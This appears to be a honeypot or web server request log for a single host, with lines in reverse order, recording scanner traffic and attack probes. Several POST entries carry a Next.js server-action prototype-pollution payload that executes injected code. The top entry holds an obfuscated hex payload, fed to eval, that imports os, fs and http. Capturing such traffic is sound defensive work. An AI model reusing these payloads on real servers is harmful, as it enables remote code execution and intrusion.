{"reason":-1,"data_kcvw":"jq53gu","value":"{\"\u0074\u0068\u0065\u006e\": \"$\u00420\"}","\u0074\u0068\u0065\u006e":"$1:\u005f\u005f\u0070\u0072\u006f\u0074\u006f\u005f\u005f:\u0074\u0068\u0065\u006e","\u005f\u0072\u0065\u0073\u0070\u006f\u006e\u0073\u0065":{"\u005f\u0070\u0072\u0065\u0066\u0069\u0078":"var agt=arguments['\\x31'];var qrxhj=agt;try{var _v=((0,eval)(global[\"\\x42\\x75\\x66\\x66\\x65\\x72\"].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761697420696d706f727428277061746827292c687474703d617... [truncated]
Content-Disposition: form-data; name="0"
--WebKitFormBoundaryZFQeIBsjGjXZWVtPv90RU37efpq
5U5A27ujmaCpqmvMNrO33NRUZLr3Zyw2rzZidcA
Content-Disposition: form-data; name="osze"
--WebKitFormBoundaryZFQeIBsjGjXZWVtPv90RU37efpq
6nHTqpJ25s03lp6aubMHEsOlG8UkoUWN7C4eAgiji
Content-Disposition: form-data; name="authenticity_token"
Body: --WebKitFormBoundaryZFQeIBsjGjXZWVtPv90RU37efpq
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryZFQeIBsjGjXZWVtPv90RU37efpq
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Next-Action: daa70730fb135d805dfa7eeba74c4c2186f4ddc9
Accept: text/x-component, */*;q=0.8
Content-Length: 16003
X-Forwarded-Proto: https
Via: 1.1 Caddy
Origin: https://admin.vulnberries.ru
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
X-Forwarded-For: 34.123.240.249
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48036
Path: /
URL: /
Method: POST
[2026-03-15 17:22:05] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50025
Path: /dump.sql
URL: /dump.sql
Method: GET
[2026-03-15 17:02:21] === HTTP Request ===
[2026-03-15 16:11:50] Main page accessed - IP: 87.236.176.79:52983
===================
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.79:52983
Path: /
URL: /
Method: GET
[2026-03-15 16:11:50] === HTTP Request ===
===================
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 92.118.39.30:56228
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-15 14:49:05] === HTTP Request ===
===================
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Referer: http://95.143.191.38:8081/
Sec-Gpc: 1
Sec-Ch-Ua-Mobile: ?0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: none
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.232.92.234:35920
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-15 14:05:41] === HTTP Request ===
[2026-03-15 14:05:41] Main page accessed - IP: 165.232.92.234:35906
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "Linux"
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.232.92.234:35906
Path: /
URL: /
Method: GET
[2026-03-15 14:05:41] === HTTP Request ===
[2026-03-15 12:59:47] Main page accessed - IP: 34.14.58.194:60814
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.14.58.194:60814
Path: /
URL: /
Method: GET
[2026-03-15 12:59:47] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.194.251.58:56316
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-15 11:30:47] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.194.251.58:56318
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-15 11:30:47] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.194.251.58:56174
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-15 11:30:47] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.194.251.58:55756
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-15 11:30:46] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.194.251.58:55238
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-15 11:30:44] === HTTP Request ===
[2026-03-15 11:30:43] Main page accessed - IP: 118.194.251.58:55044
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/568.42 (KHTML, like Gecko) Chrome/98.0.2598 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.194.251.58:55044
Path: /
URL: /
Method: GET
[2026-03-15 11:30:43] === HTTP Request ===
[2026-03-15 11:30:20] Main page accessed - IP: 152.32.130.191:47212
===================
Accept: */*
User-Agent: curl/7.29.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 152.32.130.191:47212
Path: /
URL: /
Method: GET
[2026-03-15 11:30:20] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:56790
Path: /jars
URL: /jars
Method: GET
[2026-03-15 10:48:28] === HTTP Request ===
[2026-03-15 09:55:35] Main page accessed - IP: 207.90.244.21:48260
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.21:48260
Path: /
URL: /
Method: GET
[2026-03-15 09:55:35] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.117:59066
Path: /security.txt
URL: /security.txt
Method: GET
[2026-03-15 09:49:49] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.117:47814
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-15 09:49:45] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.117:47798
Path: *
URL: *
Method: PRI
[2026-03-15 09:49:45] === HTTP Request ===
[2026-03-15 09:49:44] Main page accessed - IP: 66.132.153.117:47786
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.117:47786
Path: /
URL: /
Method: GET
[2026-03-15 09:49:44] === HTTP Request ===
[2026-03-15 09:33:50] Main page accessed - IP: 172.30.0.12:42620
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 185.22.152.250
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42620
Path: /
URL: /
Method: GET
[2026-03-15 09:33:50] === HTTP Request ===
[2026-03-15 09:33:47] Main page accessed - IP: 172.30.0.12:42620
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 185.22.152.250
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42620
Path: /
URL: /
Method: GET
[2026-03-15 09:33:47] === HTTP Request ===
[2026-03-15 09:22:11] Main page accessed - IP: 104.155.11.101:44604
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.155.11.101:44604
Path: /
URL: /
Method: GET
[2026-03-15 09:22:11] === HTTP Request ===
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.218.240.172:27022
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-15 08:39:13] === HTTP Request ===
===================
Connection: close
Referer: http://95.143.191.38:8081
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.218.240.172:26702
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-15 08:39:12] === HTTP Request ===
[2026-03-15 08:39:11] Main page accessed - IP: 103.218.240.172:26134
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.218.240.172:26134
Path: /
URL: /
Method: GET
[2026-03-15 08:39:11] === HTTP Request ===
[2026-03-15 08:39:10] Main page accessed - IP: 103.218.240.172:25202
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.218.240.172:25202
Path: /
URL: /
Method: GET
[2026-03-15 08:39:10] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.76:61816
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-15 07:51:14] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.160
Via: 2.0 Caddy
X-Forwarded-Proto: https
From: oai-searchbot(at)openai.com
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44438
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-15 07:35:58] === HTTP Request ===
[2026-03-15 07:35:58] Main page accessed - IP: 172.30.0.12:44438
===================
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.4
From: gptbot(at)openai.com
Accept: */*
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44438
Path: /
URL: /
Method: GET
[2026-03-15 07:35:58] === HTTP Request ===
===================
Authorization: [REDACTED]
User-Agent: Mozilla/5.0 Gecko/20100101
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 41.59.196.161:53152
Path: /manager/html
URL: /manager/html
Method: GET
[2026-03-15 07:29:27] === HTTP Request ===
[2026-03-15 05:03:20] Main page accessed - IP: 20.46.231.114:49094
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.46.231.114:49094
Path: /
URL: /
Method: GET
[2026-03-15 05:03:20] === HTTP Request ===
===================
------WebKitFormBoundaryx1323969913963--
------WebKitFormBoundaryx1323969913963
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1323969913963
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 280377+true+4722106;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1323969913963
Next-Action: x
Content-Length: 522
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1323969913963
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1323969913963
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:36668
Path: /api/route
URL: /api/route
Method: POST
[2026-03-15 04:36:35] === HTTP Request ===
===================
------WebKitFormBoundaryx351100927486--
------WebKitFormBoundaryx351100927486
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx351100927486
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 57895+true+6064443;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx351100927486
Next-Action: x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_351100927486
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx351100927486
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:36656
Path: /app
URL: /app
Method: POST
[2026-03-15 04:36:35] === HTTP Request ===
===================
------WebKitFormBoundaryx348833444401--
------WebKitFormBoundaryx348833444401
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx348833444401
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 93510+true+3730440;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx348833444401
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx348833444401
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_348833444401
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:36654
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-15 04:36:35] === HTTP Request ===
===================
------WebKitFormBoundaryx1393185533653--
------WebKitFormBoundaryx1393185533653
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1393185533653
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 172953+true+8055284;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1393185533653
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1393185533653
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_1393185533653
X-Nextjs-Request-Id: poop1234
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:41810
Path: /api
URL: /api
Method: POST
[2026-03-15 04:36:34] === HTTP Request ===
===================
------WebKitFormBoundaryx32621936460--
------WebKitFormBoundaryx32621936460
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx32621936460
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 19037+true+1713607;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx32621936460
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx32621936460
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Request-Id: poop1234
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_32621936460
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:41804
Path: /_next
URL: /_next
Method: POST
[2026-03-15 04:36:32] === HTTP Request ===
[2026-03-15 04:36:31] Main page accessed - IP: 95.214.55.63:41790
===================
------WebKitFormBoundaryx1286188230609--
------WebKitFormBoundaryx1286188230609
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1286188230609
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 195583+true+6576176;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1286188230609
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1286188230609
X-Nextjs-Request-Id: poop1234
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1286188230609
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:41790
Path: /
URL: /
Method: POST
[2026-03-15 04:36:31] === HTTP Request ===
[2026-03-15 04:36:29] Main page accessed - IP: 95.214.55.63:41788
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:41788
Path: /
URL: /
Method: GET
[2026-03-15 04:36:29] === HTTP Request ===
[2026-03-15 03:53:46] Main page accessed - IP: 207.90.244.26:36828
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.26:36828
Path: /
URL: /
Method: GET
[2026-03-15 03:53:46] === HTTP Request ===
[2026-03-15 02:25:45] Main page accessed - IP: 198.235.24.98:55951
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.98:55951
Path: /
URL: /
Method: GET
[2026-03-15 02:25:45] === HTTP Request ===
===================
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Accept-Language: en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Dnt: 1
Cache-Control: max-age=0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.7.106.105:31154
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-15 00:01:42] === HTTP Request ===
[2026-03-15 00:01:37] Login page accessed - IP: 111.7.106.105:30891
===================
Referer: http://95.143.191.38:8081/
Accept-Language: en
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.7.106.105:30891
Path: /login
URL: /login
Method: GET
[2026-03-15 00:01:37] === HTTP Request ===
===================
Accept-Encoding: gzip
Referer: http://95.143.191.38:8081/
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.7.106.104:48396
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-15 00:01:37] === HTTP Request ===
===================
Accept-Encoding: gzip
Referer: http://95.143.191.38:8081/
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.7.106.105:30858
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-15 00:01:37] === HTTP Request ===
[2026-03-15 00:01:36] Main page accessed - IP: 111.7.106.104:48347
===================
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Accept-Language: en
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.7.106.104:48347
Path: /
URL: /
Method: GET
[2026-03-15 00:01:36] === HTTP Request ===
[2026-03-15 00:01:35] Main page accessed - IP: 111.7.106.105:30692
===================
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Cache-Control: max-age=0
Accept-Language: en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept-Encoding: gzip
Dnt: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.7.106.105:30692
Path: /
URL: /
Method: GET
[2026-03-15 00:01:35] === HTTP Request ===
[2026-03-15 00:01:06] Main page accessed - IP: 47.91.65.21:49584
===================
Accept: */*
User-Agent: curl/7.64.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.91.65.21:49584
Path: /
URL: /
Method: GET
[2026-03-15 00:01:06] === HTTP Request ===
[2026-03-14 23:58:06] Main page accessed - IP: 176.65.149.45:55930
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:55930
Path: /
URL: /
Method: GET
[2026-03-14 23:58:06] === HTTP Request ===
[2026-03-14 23:42:17] Main page accessed - IP: 205.210.31.241:59076
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.241:59076
Path: /
URL: /
Method: GET
[2026-03-14 23:42:17] === HTTP Request ===
[2026-03-14 23:09:12] Main page accessed - IP: 164.92.82.91:36752
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 164.92.82.91:36752
Path: /
URL: /
Method: GET
[2026-03-14 23:09:12] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.16:57154
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-14 22:32:42] === HTTP Request ===
[2026-03-14 22:32:41] Main page accessed - IP: 85.217.140.16:57148
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.16:57148
Path: /
URL: /
Method: GET
[2026-03-14 22:32:41] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.153.125
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43612
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-14 19:40:14] === HTTP Request ===
[2026-03-14 19:40:13] Main page accessed - IP: 172.30.0.12:43612
===================
Accept-Encoding: gzip
Accept: */*
